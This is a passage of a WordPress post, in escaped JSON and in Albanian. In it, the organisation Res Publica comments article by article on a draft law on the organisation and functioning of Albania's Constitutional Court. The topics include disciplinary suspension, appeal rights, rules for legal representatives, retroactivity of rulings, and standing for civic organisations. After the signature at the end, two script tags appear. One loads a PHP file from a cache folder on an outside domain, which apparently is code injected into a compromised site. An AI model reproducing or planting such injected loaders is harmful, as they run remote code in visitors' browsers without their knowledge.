N\u00eb \u00e7do rast, n\u00ebse nga ana Juaj k\u00ebrkohet shtjellim i m\u00ebtejsh\u00ebm, Ju lutemi na kontaktoni n\u00eb \u00e7do koh\u00eb.<\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<ol>\n<li><strong>N\u00eb lidhje me pik\u00ebn c, paragrafi 1 i nenit 10\/b<\/strong><\/li>\n<\/ol>\n<p>N\u00eb nenin 10\/b t\u00eb ligjit parashikohen masat disiplinore q\u00eb merren ndaj an\u00ebtar\u00ebve t\u00eb Gjykat\u00ebs Kushtetues. Nj\u00eb nga masat q\u00eb parashikohet \u00ebsht\u00eb pezullimi nga detyra p\u00ebr nj\u00eb periudh\u00eb nga 3 muaj deri n\u00eb 1 vit, me t\u00eb drejt\u00eb p\u00ebrfitimin e pag\u00ebs minimale sipas vendimit t\u00eb K\u00ebshillit t\u00eb Ministrave.<\/p>\n<p>Shprehim mendimin q\u00eb kjo periudh\u00eb \u00ebsht\u00eb shume e gjat\u00eb, e cila ndikon dhe n\u00eb veprimtarin\u00eb e Gjykta\u00ebs Kushtetuese, p\u00ebr k\u00ebt\u00eb arsye pezullimi nga detyra ose mund t\u00eb jet\u00eb p\u00ebr nj\u00eb periudh\u00eb m\u00eb t\u00eb shkurt\u00ebr, (psh. deri n\u00eb 3 muaj), ose t\u00eb mos parashikohet si nj\u00eb lloj mase disiplinore, pasi nj\u00eb gjyqtar q\u00eb ka kryer nj\u00eb shkelje t\u00eb till\u00eb, q\u00eb \u00e7on deri n\u00eb pezullimin nga detyra p\u00ebr nj\u00eb periudh\u00eb t\u00eb gjat\u00eb, n\u00ebse marrim rastin maksimal deri n\u00eb 1 vit, nuk mund \u201ct\u00eb rehabilitohet\u201d dhe t\u00eb vazhdoj\u00eb detyr\u00ebn sikur nuk ka ndodhur asgj\u00eb, aq m\u00eb tep\u00ebr kur kjo situat\u00eb pasjell dhe nj\u00eb degradim t\u00eb figur\u00ebs s\u00eb gjyqtarit, pasi parashikon sigurimin e jetes\u00ebs minimale.<\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<ol start=\"2\">\n<li><strong>N\u00eb lidhje me pik\u00ebn \u00eb t\u00eb nenit 13<\/strong><\/li>\n<\/ol>\n<p>N\u00eb nenin 13, parashikohen kompetencat e Mbledhjes s\u00eb Gjyqtar\u00ebve. Nj\u00eb nga kompetencat q\u00eb ka Mbledhja e Gjyqtar\u00ebve \u00ebsht\u00eb shqyrtimi n\u00eb shkall\u00eb t\u00eb fundit t\u00eb ankimeve t\u00eb punonj\u00ebsve t\u00eb Gjykat\u00ebs Kushtetuese p\u00ebr masat disiplinore ndaj tyre, p\u00ebrfshir\u00eb dhe largimin nga detyra.<\/p>\n<p>Kjo dispozit\u00eb, n\u00ebnkupton, t\u00eb pakt\u00ebn n\u00eb m\u00ebnyr\u00ebn q\u00eb \u00ebsht\u00eb shkruar, q\u00eb masat disiplinore t\u00eb punonj\u00ebsve dhe largimi i tyre nga detyra shqyrtohet nga Mbledhja e Gjyqtar\u00ebve, e cila \u00ebsht\u00eb dhe shkalla e fundit e shqyrtimit. Ky parashikim \u201ckufizon\u201d t\u00eb drejt\u00ebn e ankimit p\u00ebr t\u2019iu drejtuar gjykatave, si organe t\u00eb pavarura dhe t\u00eb paanshme p\u00ebr shqyrtimin e \u00e7\u00ebshtjes.<\/p>\n<p>&nbsp;<\/p>\n<ol start=\"3\">\n<li><strong>N\u00eb lidhje me nenin 24<\/strong><\/li>\n<\/ol>\n<p>N\u00eb nenin 24, parashikohet se pjes\u00ebmarr\u00ebsit n\u00eb gjykimin kushtetues mbrohen vet\u00eb ose n\u00ebp\u00ebrmjet p\u00ebrfaq\u00ebsuesit ligjor. Kur \u00e7\u00ebshtja kalon p\u00ebr gjykim dhe objekt k\u00ebrkese \u00ebsht\u00eb nj\u00eb ligj ose akt normativ, k\u00ebrkuesi p\u00ebrfaq\u00ebsohet n\u00eb gjykim me avokat ose p\u00ebrfaq\u00ebsues ligjor t\u00eb specializuar. Mbledhja e Gjyqtar\u00ebve p\u00ebrcakton kriteret dhe kushtet p\u00ebr p\u00ebrfaq\u00ebsuesit ligjor\u00eb t\u00eb subjekteve q\u00eb marrin pjes\u00eb n\u00eb gjykimin para Gjykat\u00ebs Kushtetuese.<\/p>\n<p>Sipas dizpozit\u00ebs s\u00eb m\u00ebsip\u00ebrme, pasi \u00e7\u00ebshtja kalon p\u00ebr gjykim, Mbledhja e Gjyqtar\u00ebve p\u00ebrcakton kriteret dhe kushtet p\u00ebr p\u00ebrfaq\u00ebsuesit ligjor\u00eb t\u00eb subjekteve q\u00eb marrin pjes\u00eb n\u00eb gjykimin para Gjykat\u00ebs Kushtetuese. Jemi t\u00eb mendimit q\u00eb ky paragraf nuk duhet t\u00eb parashikohet, pasi profesioni i avokatit \u00ebsht\u00eb nj\u00eb profesion i vet\u00eb rregulluar dhe kompetente p\u00ebr t\u00eb p\u00ebrcaktuar kriteret dhe kushtet p\u00ebr avokat\u00ebt jan\u00eb organet drejtuese t\u00eb Dhom\u00ebs s\u00eb Komb\u00ebtare t\u00eb Avokatis\u00eb, si psh (K\u00ebshilli Drejtues).<\/p>\n<p>&nbsp;<\/p>\n<ol start=\"4\">\n<li><strong>N\u00eb lidhje me nenin 26<\/strong><\/li>\n<\/ol>\n<p>N\u00eb nenin 26 parashikohet publikimi dhe hyrja n\u00eb fuqi e vendimeve t\u00eb Gjykat\u00ebs Kushtetuese.<\/p>\n<p>Shprehim mendimin q\u00eb n\u00eb k\u00ebt\u00eb nen duhet t\u00eb parashikohen rastet kur vendimi duhet t\u00eb ket\u00eb efekt prapaveprues, pasi n\u00eb rastet kur nj\u00eb ligj ka krijuar pasoja,vendimi q\u00eb e ka\u00a0 shfuqizuar si antikushtetues, duhet t\u00eb rregulloj\u00eb dhe pasojat q\u00eb ky ligj ka krijuar deri\u00a0 n\u00eb momentin e shfuqizimit. Shembulli q\u00eb sjellim n\u00eb lidhje me k\u00ebt\u00eb pik\u00eb \u00ebsht\u00eb Vendimi i Gjykat\u00ebs Kushtetuese nr.16, dat\u00eb 09.03.2000, sipas t\u00eb cilit u shpall antikushtetues kthimi i pronave, t\u00eb cilat ishin t\u00eb sekuestruar p\u00ebr mospages\u00eb t\u00eb tatimit t\u00eb jashtzakonsh\u00ebm t\u00eb luft\u00ebs. Ky vendim nuk rregulloi asnj\u00eb pasoj\u00eb, pasi pronat nd\u00ebrkoh\u00eb ishin kthyer dhe sot vazhdojn\u00eb ti g\u00ebzojn\u00eb, pavar\u00ebsisht se m\u00ebnyra e fitimit ka qen\u00eb antikushtetuese.<\/p>\n<p>&nbsp;<\/p>\n<ol start=\"5\">\n<li><strong>N\u00eb lidhje me nenin 27<\/strong><\/li>\n<\/ol>\n<p>N\u00eb nenin 27 parashikohen kriteret dhe elementet q\u00eb duhet t\u00eb p\u00ebrmbaj\u00eb k\u00ebrkesa q\u00eb i drejtohet Gjykat\u00ebs Kushtetuese. N\u00eb rastet kur mungon nj\u00ebri nga elementet, k\u00ebrkesa nuk rregjistrohet dhe i kthehet k\u00ebrkuesit p\u00ebr tu plot\u00ebsuar brenda nj\u00eb afati t\u00eb caktuar. Mendojm\u00eb q\u00eb zgjidhja m\u00eb e mir\u00eb do ishte q\u00eb k\u00ebrkesa t\u00eb rregjistrohej dhe k\u00ebrkuesit ti lihej nj\u00eb afat p\u00ebr t\u00eb plot\u00ebsuar t\u00eb metat, n\u00ebse k\u00ebrkuesi nuk i plot\u00ebson at\u00ebher\u00eb aktet i kthehen pa veprim. N\u00eb m\u00ebnyr\u00ebn si \u00ebsht\u00eb parashikuar n\u00eb k\u00ebt\u00eb dispozit\u00eb, nuk i jep zgjidhje n\u00eb lidhje me afatin e dor\u00ebzimit t\u00eb k\u00ebrkes\u00ebs, pasi k\u00ebrkesa do t\u00eb konsiderohet e rregjistruar nga momenti q\u00eb \u00ebsht\u00eb d\u00ebrguar p\u00ebr her\u00eb t\u00eb par\u00eb, apo pasi t\u00eb jen\u00eb plot\u00ebsuar t\u00eb metat. Ky parashikim sjell si pasoj\u00eb c\u00ebnimin e aksesit n\u00eb gjykat\u00eb.<\/p>\n<p>&nbsp;<\/p>\n<ol start=\"6\">\n<li><strong>N\u00eb lidhje me pik\u00ebn 1 t\u00eb nenit 31<\/strong><\/li>\n<\/ol>\n<p>N\u00eb paragrafin 1 t\u00eb nenit 31 parashikohet se ndarja e gjyqtar\u00ebve n\u00eb Kolegje vendoset nga Kryetari, nd\u00ebrkoh\u00eb n\u00eb nenin 13 pika e,\u00a0 parashikohet se Kolegjet caktohen n\u00eb fillim t\u00eb \u00e7do viti nga Mbledhja e Gjyqtar\u00ebve. Mendojm\u00eb q\u00eb duhet t\u00eb b\u00ebhet nj\u00eb rakordim midis k\u00ebtyre dy dizpozitave, n\u00eb m\u00ebnyr\u00eb q\u00eb t\u00eb shmanget mbivendosja e kompetencave.<\/p>\n<p>&nbsp;<\/p>\n<ol start=\"7\">\n<li><strong>N\u00eb lidhje me shfuqizimin e nenit 47<\/strong><\/li>\n<\/ol>\n<p>N\u00eb nenin 47 \u00ebsht\u00eb parashikuar mbajtja e procesverbalit t\u00eb seanc\u00ebs. Kjo dispozit\u00eb \u00ebsht\u00eb shfuqizuar me iden\u00eb p\u00ebr ta p\u00ebrfshir\u00eb n\u00eb rregullore.<\/p>\n<p>Mendojm\u00eb q\u00eb kjo dispozit\u00eb nuk duhet t\u00eb shfuqizohet, pasi procesverbali i seanc\u00ebs \u00ebsht\u00eb\u00a0 nj\u00eb dokument thelb\u00ebsor i nj\u00eb procesi gjyq\u00ebsor, dhe si i till\u00eb parashikimi i rregullave t\u00eb mbajtjes s\u00eb tij duhet t\u00eb jen\u00eb t\u00eb parashikuara n\u00eb ligj.<\/p>\n<p>&nbsp;<\/p>\n<ol start=\"8\">\n<li><strong>N\u00eb lidhje me nenin 49<\/strong><\/li>\n<\/ol>\n<p>N\u00eb nenin 49 parashikohen subjektet q\u00eb v\u00ebn\u00eb n\u00eb l\u00ebvizje Gjykat\u00ebn Kushtetuese. N\u00eb pik\u00ebn d t\u00eb paragrafit 3, parashikohet se t\u00eb drejt\u00ebn p\u00ebr t\u00eb filluar nj\u00eb kontroll mbi pajtueshm\u00ebrin\u00eb e ligjit ose akteve t\u00eb tjera normative me Kushtetut\u00ebn ose marr\u00ebveshjet nd\u00ebrkomb\u00ebtare e kan\u00eb edhe organet e bashk\u00ebsive fetare, partit\u00eb politike, organizatat, kur pretendojn\u00eb se ligji ose akti normativ cenon <strong>veprimtarin\u00eb e tyre dhe t\u00eb drejtat dhe lirit\u00eb e an\u00ebtar\u00ebve t\u00eb tyre.<\/strong><\/p>\n<p>Kusht\u00ebzimi i t\u00eb drejt\u00ebs s\u00eb organizatave p\u00ebr t\u2019iu drejtuar Gjykat\u00ebs Kushtetuese vet\u00ebm n\u00eb rastet kur c\u00ebnohet veprimtaria dhe t\u00eb drejtat dhe lirit\u00eb e an\u00ebtar\u00ebve t\u00eb tyre, sjell nj\u00eb kufizim t\u00eb s\u00eb drejt\u00ebs s\u00eb organizatave q\u00eb jan\u00eb pa an\u00ebtar\u00ebsi p\u00ebr t\u2019iu drejtuar GjK. Nga praktika \u00ebsht\u00eb konstatuar se organizatat e shoq\u00ebris\u00eb civile, gjat\u00eb veprimtaris\u00eb s\u00eb tyre mbrojn\u00eb dhe p\u00ebrfaq\u00ebsojn\u00eb interesat e grupeve t\u00eb ndryshme shoq\u00ebrore. P\u00ebr k\u00ebt\u00eb arsye duhet t\u00eb parashikohet se organizatat kan\u00eb t\u00eb drejt\u00eb ti drejtohen GJK, jo vet\u00ebm kur ligjet shkelin t\u00eb drejtat e an\u00ebtar\u00ebve t\u00eb organizat\u00ebs, por n\u00eb t\u00eb gjitha rastet kur organizata shpreh interes dhe mbron t\u00eb drejtat e nj\u00eb grupi t\u00eb caktuar shoq\u00ebror, t\u00eb drejtat e t\u00eb cilave shkelen nga nj\u00eb ligj apo akt normativ.<\/p>\n<p>Gjithashtu n\u00eb pik\u00ebn e, t\u00eb k\u00ebtij paragrafi parashikohet se individ\u00ebt kan\u00eb t\u00eb drejt\u00eb ti drejtohen GJK kur pretendojn\u00eb se u cenohen t\u00eb drejtat dhe lirit\u00eb e tyre t\u00eb parashikuara n\u00eb Kushtetut\u00eb, pasi kan\u00eb shteruar t\u00eb gjitha mjetet juridike p\u00ebr k\u00ebt\u00eb q\u00ebllim si dhe kur <strong>akti q\u00eb kund\u00ebrshtojn\u00eb \u00ebsht\u00eb drejtp\u00ebrdrejt i zbatuesh\u00ebm dhe nuk parashikon nxjerrjen<\/strong> <strong>e akteve n\u00ebnligjore p\u00ebr zbatimin e<\/strong> <strong>tij<\/strong><strong>.<\/strong><\/p>\n<p>\u00cbsht\u00eb i paqart\u00eb fakti se \u00e7far\u00eb do t\u00eb konsiderojm\u00eb nj\u00eb akt q\u00eb \u00ebsht\u00eb i zbatuesh\u00ebm drejtp\u00ebrdrejt\u00eb dhe nuk parashikon nxjerrjen e akteve n\u00ebnligjore. Sipas k\u00ebtij parashikimi, do ti n\u00ebnshtrohen kontrollit kushtetues vet\u00ebm aktet, t\u00eb cilat nuk parashikojn\u00eb nxjerrjen e akteve n\u00ebnligjore. Po n\u00eb rastet kur kund\u00ebrshtohet nj\u00eb ligj, \u00a0i cili ka c\u00ebnuar t\u00eb drejtat dhe lirit\u00eb e individit, por p\u00ebr zbatimin e tij parashikohet nxjerrja e akteve n\u00ebnligjore, ky ligj nuk i n\u00ebnshtrohet shqyrtimit nga GJK.<\/p>\n<p>&nbsp;<\/p>\n<ol start=\"9\">\n<li><strong>N\u00eb lidhje me nenin 51 pika a<\/strong><\/li>\n<\/ol>\n<p>N\u00eb nenin 51\/a parashikohen vendimet q\u00eb merr GjK. N\u00eb pik\u00ebn b t\u00eb paragrafit 1, GJK kur vendos pranimin t\u00ebr\u00ebsisht apo pjes\u00ebrisht t\u00eb vendimit vendos shfuqizimin e ligjit ose t\u00eb aktit normativ.<\/p>\n<p>Nj\u00eb akt q\u00eb shfuqizohet n\u00eb rast se pranohet k\u00ebrkesa mund t\u00eb jet\u00eb edhe nj\u00eb vendim gjyq\u00ebsor, shprehim mendimin q\u00eb kjo t\u00eb p\u00ebrfshihet n\u00eb k\u00ebt\u00eb pik\u00eb.<\/p>\n<p>Gjithashtu sugjerojm\u00eb q\u00eb n\u00eb rastet kur GJK konstaton q\u00eb nj\u00eb subjekti i jan\u00eb c\u00ebnuar\u00a0 t\u00eb drejtat dhe lirit\u00eb, ti jepet nj\u00eb d\u00ebmshp\u00ebrblim pasuror. N\u00eb nenin 71\/\u00e7 \u00ebsht\u00eb parashikuar q\u00eb d\u00ebmshp\u00ebrblimi jepet vet\u00ebm n\u00eb rastet kur afatet e procesit jan\u00eb tejkaluar. D\u00ebmshp\u00ebrblimi nuk duhet t\u00eb jepet vet\u00ebm n\u00eb k\u00ebt\u00eb rast, pasi n\u00eb praktik\u00eb jan\u00eb konstatuar raste q\u00eb p\u00ebrve\u00e7 faktit q\u00eb procesi ka tejkaluar afatet ose jo, individit i jan\u00eb shkelur t\u00eb drejta, t\u00eb cilat nuk rivendosen n\u00eb vend as nga vendimi i GjK, i cili n\u00eb k\u00ebto raste thjesht \u00ebsht\u00eb nj\u00eb vendim deklarativ.<\/p>\n<p>&nbsp;<\/p>\n<p><em>Res Publica<\/em><\/p>\n<p>&nbsp;<script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Komenete n\u00eb lidhje me Projekt ligjin \u201cP\u00ebr organizimin\u00a0dhe funksionimin e Gjykat\u00ebs Kushtetuese t\u00eb Republik\u00ebs s\u00eb Shqip\u00ebris\u00eb\u201d &nbsp;
